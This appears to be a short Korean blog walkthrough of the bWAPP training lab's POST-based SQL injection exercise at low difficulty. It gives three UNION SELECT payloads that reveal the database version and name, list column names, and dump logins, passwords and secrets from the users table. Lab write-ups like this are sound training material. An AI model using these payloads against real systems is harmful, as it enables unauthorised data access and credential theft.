bWAPP SQL Injection [ POST/Search ] Current : low
Search를 눌러 문제페이지를 분석해보면 아래와 같이
POST방식으로 URL에 매개변수를 노출하고 있지 않습니다.따라서 Search 를 눌러 패킷을 잡고 분석해본 결과 아래와 같이
title변수와 , action 변수가 노출됩니다.따라서 아래와 같이
1' UNION ALL SELECT 1,@@version,3,4,database(),6,7#문을 이용하여 데이터베이스의 정보를 확인합니다.확인 결과 아래와 같이 버전과 , 데이터베이스 이름이 노출됩니다.
1' UNION ALL SELECT 1,column_name,3,4,5,6,7 from information_schema.columns# 를 통해 칼럼명을 알아냅니다.알아낸 결과 아래와 같이
id , login , password , email , secret ,email 등 다양한 데이터 정보가 노출됩니다. 이를 통해
1' UNION ALL SELECT 1,password,login,secret,5,6,7 from users#문을 통해 중요 정보를 알아낼수있습니다.









댓글
댓글 쓰기